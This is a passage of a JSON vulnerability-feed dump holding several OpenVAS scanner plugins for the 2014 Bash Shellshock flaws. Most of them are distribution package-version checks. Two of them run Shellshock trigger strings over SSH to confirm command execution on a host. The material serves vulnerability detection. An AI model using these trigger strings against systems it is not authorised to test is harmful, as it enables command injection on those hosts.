Shell RCE Vulnerability (LSC) - 02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2018-11-27T00:00:00", "id": "OPENVAS:1361412562310802082", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802082", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bash_shellshock_credential_cmd_exec_vuln_02.nasl 12551 2018-11-27 14:35:38Z cfischer $\n#\n# GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 02\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:gnu:bash\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802082\");\n script_version(\"$Revision: 12551 $\");\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-27 15:35:38 +0100 (Tue, 27 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-08 10:10:49 +0530 (Wed, 08 Oct 2014)\");\n script_name(\"GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 02\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_gnu_bash_detect_lin.nasl\");\n script_mandatory_keys(\"bash/linux/detected\");\n script_exclude_keys(\"ssh/force/pty\");\n\n script_xref(name:\"URL\", value:\"https://ftp.gnu.org/gnu/bash/\");\n script_xref(name:\"URL\", value:\"https://shellshocker.net/\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/252743\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2014/09/24/32\");\n script_xref(name:\"URL\", value:\"https://community.qualys.com/blogs/securitylabs/2014/09/24/bash-remote-code-execution-vulnerability-cve-2014-6271\");\n\n script_tag(name:\"summary\", value:\"This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Login to the target machine with ssh\n credentials and check its possible to execute the commands via GNU bash shell.\");\n\n script_tag(name:\"insight\", value:\"GNU bash contains a flaw that is triggered\n when evaluating environment variables passed from another environment.\n After processing a function definition, bash continues to process trailing\n strings. Incomplete fix to CVE-2014-6271\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n or local attackers to inject shell commands, allowing local privilege\n escalation or remote command execution depending on the application vector.\");\n\n script_tag(name:\"affected\", value:\"GNU Bash through 4.3 bash43-025\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"ssh_func.inc\");\ninclude(\"host_details.inc\");\n\nif( get_kb_item( \"ssh/force/pty\" ) ) exit( 0 );\n\nif( isnull( port = get_app_port( cpe:CPE, service:\"ssh-login\" ) ) ) exit( 0 );\nif( ! bin = get_app_location( cpe:CPE, port:port ) ) exit( 0 ); # Returns e.g. \"/bin/bash\" or \"unknown\" (if the location of the binary wasn't detected).\n\nsock = ssh_login_or_reuse_connection();\nif( ! sock ) exit( 0 );\n\nif( bin == \"unknown\" )\n bash_cmd = \"bash\";\nelse if( bin =~ \"^/.*bash$\" )\n bash_cmd = bin;\nelse\n exit( 0 ); # Safeguard if something is broken in the bash detection\n\n# echo \"cd /tmp; rm -f /tmp/echo; env X='() { (VT Test)=>\\' /bin/bash -c 'echo id'; cat echo; rm -f /tmp/echo\" | /bin/bash\ncmd = 'echo \"' + \"cd /tmp; rm -f /tmp/echo; env X='() { (VT Test)=>\\' \" + bash_cmd + \" -c 'echo id'; cat echo; rm -f /tmp/echo\" + '\" | ' + bash_cmd;\n\nresult = ssh_cmd( socket:sock, cmd:cmd, nosh:TRUE );\nclose( sock );\n\nif( result =~ \"uid=[0-9]+.*gid=[0-9]+.*\" ) {\n report = \"Used command: \" + cmd + '\\n\\nResult: ' + result;\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:26", "description": "Gentoo Linux Local Security Checks GLSA 201409-10", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201409-10", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121273", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121273", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201409-10.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121273\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:55 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201409-10\");\n script_tag(name:\"insight\", value:\"Stephane Chazelas reported that Bash incorrectly handles function definitions, allowing attackers to inject arbitrary code (CVE-2014-6271). Gentoo Linux informed about this issue in GLSA 201409-09.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201409-10\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201409-10\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 3.1_p18-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 3.2_p52-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 4.0_p39-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 4.1_p12-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 4.2_p48-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(), vulnerable: make_list(\"lt 4.2_p48-r1\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-08-02T10:48:56", "description": "Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169 \n). With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3035-1 (bash - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2017-07-18T00:00:00", "id": "OPENVAS:703035", "href": "http://plugins.openvas.org/nasl.php?oid=703035", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3035.nasl 6750 2017-07-18 09:56:47Z teissa $\n# Auto-generated from advisory DSA 3035-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703035);\n script_version(\"$Revision: 6750 $\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_name(\"Debian Security Advisory DSA 3035-1 (bash - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-18 11:56:47 +0200 (Tue, 18 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 17:00:22 +0530 (Wed, 01 Oct 2014)\");\n script_tag(name: \"cvss_base\", value:\"10.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3035.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"bash on Debian Linux\");\n script_tag(name: \"insight\", value: \"Bash is an sh-compatible command language interpreter that executes\ncommands read from the standard input or from a file. Bash also\nincorporates useful features from the Korn and C shells (ksh and csh).\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy), these problems have been fixed in\nversion 4.2+dfsg-0.1+deb7u3.\n\nWe recommend that you upgrade your bash packages.\");\n script_tag(name: \"summary\", value: \"Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169 \n). With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat's internal analysis for these\nissues and also independently reported by Todd Sabin.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:34", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Fedora Update for bash FEDORA-2014-11527", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868208", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868208", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bash FEDORA-2014-11527\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868208\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:59:50 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for bash FEDORA-2014-11527\");\n script_tag(name:\"affected\", value:\"bash on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-11527\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138687.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.48~2.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:37", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "openvas", "title": "RedHat Update for bash RHSA-2014:1306-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310871250", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871250", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for bash RHSA-2014:1306-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871250\");\n script_version(\"$Revision: 12380 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-26 06:07:13 +0200 (Fri, 26 Sep 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for bash RHSA-2014:1306-01\");\n script_tag(name:\"insight\", value:\"The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. For more information see the referenced Knowledgebase article.\n\nNote: Docker users are advised to use 'yum update' within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"bash on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"RHSA\", value:\"2014:1306-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-September/msg00053.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6|5)\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1200223\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.45~5.el7_0.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.2.45~5.el7_0.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.1.2~15.el6_5.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.1.2~15.el6_5.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~33.el5_11.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~3.2~33.el5_11.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:19", "description": "This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.", "cvss3": {}, "published": "2014-10-08T00:00:00", "type": "openvas", "title": "GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 04", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6271"], "modified": "2018-11-27T00:00:00", "id": "OPENVAS:1361412562310802086", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802086", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bash_shellshock_credential_cmd_exec_vuln_04.nasl 12551 2018-11-27 14:35:38Z cfischer $\n#\n# GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 04\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:gnu:bash\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802086\");\n script_version(\"$Revision: 12551 $\");\n script_cve_id(\"CVE-2014-6277\");\n script_bugtraq_id(70165);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-27 15:35:38 +0100 (Tue, 27 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-08 12:11:49 +0530 (Wed, 08 Oct 2014)\");\n script_name(\"GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 04\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_gnu_bash_detect_lin.nasl\");\n script_mandatory_keys(\"bash/linux/detected\");\n script_exclude_keys(\"ssh/force/pty\");\n\n script_xref(name:\"URL\", value:\"https://shellshocker.net\");\n script_xref(name:\"URL\", value:\"http://lcamtuf.blogspot.in/2014/09/bash-bug-apply-unofficial-patch-now.html\");\n script_xref(name:\"URL\", value:\"https://ftp.gnu.org/gnu/bash/\");\n\n script_tag(name:\"summary\", value:\"This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Login to the target machine with ssh\n credentials and check its possible to execute the commands via GNU bash shell.\");\n\n script_tag(name:\"insight\", value:\"GNU bash contains a flaw that is triggered\n when evaluating environment variables passed from another environment.\n After processing a function definition, bash continues to process trailing\n strings. Incomplete fix to CVE-2014-7169, CVE-2014-6271\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n or local attackers to inject shell commands, allowing local privilege\n escalation or remote command execution depending on the application vector.\");\n\n script_tag(name:\"affected\", value:\"GNU Bash through 4.3 bash43-026\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"ssh_func.inc\");\ninclude(\"host_details.inc\");\n\nif( get_kb_item( \"ssh/force/pty\" ) ) exit( 0 );\n\nif( isnull( port = get_app_port( cpe:CPE, service:\"ssh-login\" ) ) ) exit( 0 );\nif( ! bin = get_app_location( cpe:CPE, port:port ) ) exit( 0 ); # Returns e.g. \"/bin/bash\" or \"unknown\" (if the location of the binary wasn't detected).\n\nsock = ssh_login_or_reuse_connection();\nif( ! sock ) exit( 0 );\n\nif( bin == \"unknown\" )\n bash_cmd = \"bash\";\nelse if( bin =~ \"^/.*bash$\" )\n bash_cmd = bin;\nelse\n exit( 0 ); # Safeguard if something is broken in the bash detection\n\n# echo \"vt_test='() { x() { _;}; x() { _;} <<a; }' /bin/bash -c date 2>/dev/null || echo CVE-2014-6277 vulnerable\" | /bin/bash\ncmd = 'echo \"' + \"vt_test='() { x() { _;}; x() { _;} <<a; }' \" + bash_cmd + \" -c date 2>/dev/null || echo CVE-2014-6277 vulnerable\" + '\" | ' + bash_cmd;\n\nresult = ssh_cmd( socket:sock, cmd:cmd, nosh:TRUE );\nclose( sock );\n\nif( \"Unsupported use of\" >< result ) exit( 99 );\n\nif( \"CVE-2014-6277 vulnerable\" >< result ) {\n report = \"Used command: \" + cmd + '\\n\\nResult: ' + result;\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", 